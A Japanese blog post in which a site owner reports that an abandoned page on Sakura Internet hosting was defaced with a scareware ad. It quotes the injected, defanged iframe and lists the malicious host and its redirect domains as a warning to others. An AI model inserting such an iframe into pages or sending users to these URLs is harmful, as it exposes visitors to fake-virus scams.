さくらインターネットで放置してあったhtmlが改ざんされていたよ

2008年の春頃にあるアフィリエイト手法を購入しました。
しかし、サイト構築中に頓挫し放置してあったサイトが有りました。
久しぶりにどんなサイトだったか見てみようかと思ったところ、様子がおかしい・・・。

なんと改ざんされていました。

あの皆さんおなじみな
「あなたのPCのがウイルスに感染しています」
な広告が埋め込まれちゃっていました。ムカつく!!

埋め込まれたのは

2009/01/14
2008/11/08

でした。
こんなコードがテーブルに突っ込まれていました。

<TD>
<div align=”center”><iframe src=”http://nds.mydns.to/cgi-bin/infotop.cgi?id_i=31105&m=0&i=0&t=0&h=24&c=0&r=&cl=” marginwidth=”1” marginheight=”1” width=”200” height=”1400” border=”0” frameborder=”0” style=”border:none;” scrolling=”auto”><A href=http://nds.mydns.to/>info-get</a></iframe></div>
</TD>

これ、どんな改ざんだったかということを、ここに記入するだけでインラインフレームが機能してしまい
忌々しいダイアログが出てさしずめブラクラのようになってしまい苦労させられました。
そのためとりあえず全角に変換しました。
このコードを書いてしまうとブラウザを通した瞬間からカタコトの警告メッセージが語られ始めます・・・。

インラインフレームの内容はこれです。

http://nds.mydns.to/cgi-bin/infotop.cgi?id_i=31105&m=0&i=0&t=0&h=24&c=0&r=&cl=

これあまり試さないほうがいいとは思いますが、

http://nds.mydns.to/

にアクセスすると、たちまちリダイレクトされて

http://scifiregulatoroy.info/indexcr11.html (chrome)
http://scifiregulatoroy.info/indexfirefox.html (firefox)

に飛ばされます。FireFoxの場合404となって機能しないようです。

このmydns.toっていうのは、間違いなくmydnd.jpを真似て取得したんでしょうねえ・・・。
mydnd.jpの方はとても素晴らしいサービスです。とっても有名なDDNSですね。自作サーバーにドメインを設定したい場合は必須なサービスです。
それをこんなクソなことに使うなんて・・。

それにしてもこの広告ってものすごくはびこっていますが、儲かっているのでしょうか・・・?
いままでも時々出ることはありましたが、
自分のところにも埋め込まれてるってことは、その殆どが意図せずに埋め込まれてるってことなんですね。

これ引数が

infotop.cgi?id_i=31105&m=0&i=0&t=0&h=24&c=0&r=&cl=

になってるのが気になるのですが、
このインフォトップのクッキーが埋め込められているのでしょうかね。
そう思って調べてみたのですが、ID=31105 は埋め込められてませんでした。

随分前に改ざんされっぱなしで迂闊でした。
意外と簡単に改ざんされてしまうみたいなので、一旦確認したほうが良いですよ、というお話でした。